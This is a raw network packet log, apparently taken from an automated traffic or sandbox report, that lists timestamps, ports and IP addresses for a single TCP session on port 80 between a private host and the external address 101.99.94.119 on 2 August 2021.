Aug 2, 2021 21:20:11.882945061 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.932694912 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932858944 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932898045 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932940960 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.932944059 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.932969093 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.933052063 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.982657909 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982708931 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982744932 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982781887 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982825994 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982825041 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.982887030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982904911 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.982945919 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.982996941 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.983000994 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:11.983074903 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:11.983122110 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.031961918 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032012939 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032052040 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032087088 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032133102 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032175064 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032187939 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032213926 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032252073 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032286882 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032289028 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032325029 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032330036 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032361984 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032397985 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032399893 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032444954 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032464027 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032486916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032524109 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032557011 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032562971 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.032624006 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.032658100 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.081442118 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081500053 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081535101 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081583023 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081641912 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081681013 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081718922 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081748009 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081794024 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081836939 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081873894 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081877947 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.081912994 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081940889 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.081974983 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.081983089 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082003117 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082041025 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082042933 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082077026 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082120895 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082134008 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082158089 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082212925 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082220078 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082268000 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082281113 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082305908 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082351923 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082366943 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082396030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082431078 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082448959 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082468033 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082504034 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082519054 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082537889 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082575083 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082577944 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082609892 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082634926 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082655907 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082696915 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082730055 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.082731962 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.082849026 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.131598949 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131665945 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131710052 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131747961 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131787062 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131797075 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.131824970 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131861925 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131861925 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.131897926 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131934881 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.131954908 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.131980896 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132015944 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132024050 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132061005 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132086039 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132098913 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132136106 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132170916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132184029 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132210016 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132247925 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132262945 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132294893 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132322073 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132335901 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132373095 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132378101 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132410049 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132446051 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132461071 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132482052 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132519960 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132544994 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132555962 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132601976 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132610083 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132642984 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132678986 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132697105 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132716894 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132754087 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132786989 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132788897 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132826090 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132857084 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132863045 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132909060 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132946968 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.132950068 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.132986069 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133023024 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133060932 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133076906 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133096933 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133128881 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133132935 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133169889 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133184910 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133218050 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133261919 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133270025 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133297920 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133335114 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133347034 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133371115 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133407116 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133419991 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133443117 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133480072 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133488894 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133526087 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.133544922 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.133609056 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.182540894 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182595968 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182634115 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182671070 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182707071 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182753086 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182794094 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182828903 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182845116 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.182868004 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182904005 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.182909966 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182945013 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.182965040 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.182981968 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183017969 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183024883 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183063030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183085918 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183104992 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183142900 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183170080 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183207989 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183233023 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183244944 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183281898 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183295012 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183316946 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183353901 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183388948 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183389902 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183434963 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183451891 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183475971 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183511972 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183525085 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183548927 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183584929 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183609962 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183619976 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183656931 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183670998 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183692932 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183738947 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183743000 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183779955 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183806896 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183815956 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183854103 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183859110 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183890104 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183924913 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183960915 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.183983088 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.183996916 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184026003 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184042931 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184082985 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184103966 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184118986 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184155941 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184196949 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184221029 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184236050 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184273005 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184308052 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184354067 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184365034 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184395075 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184398890 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184432030 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184472084 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.184503078 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184554100 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.184643030 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.233374119 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233428001 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233464956 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233501911 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233539104 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233584881 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233625889 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233649969 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.233661890 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233690023 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.233700037 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233736992 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233772039 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233808041 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233822107 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.233830929 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.233844042 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233891010 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233931065 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.233967066 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234004974 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234031916 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234041929 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234051943 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234059095 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234077930 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234114885 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234150887 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234155893 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234196901 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234217882 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234240055 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234272957 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234276056 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234313011 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234342098 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234349966 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234385014 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234405041 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234510899 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.234913111 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234940052 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.234998941 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235037088 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235074043 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235074043 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235110998 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235131025 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235198975 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235222101 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235249043 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235269070 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235290051 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235326052 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235327005 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235363007 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235399961 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235434055 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235438108 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235471010 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235474110 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235507011 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235544920 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235553026 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235594988 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235608101 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235640049 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235657930 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235687017 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235718012 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235723972 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235760927 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.235815048 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.235898018 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.283440113 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283495903 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283535004 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283572912 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283611059 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283646107 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283662081 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.283684015 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283720016 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283756018 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.283766985 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283808947 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283835888 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.283844948 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283881903 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283883095 CEST	49766	80	192.168.2.4	101.99.94.119
Aug 2, 2021 21:20:12.283917904 CEST	80	49766	101.99.94.119	192.168.2.4
Aug 2, 2021 21:20:12.283943892 CEST	49766	80	192.168.2.4	101.99.94.119
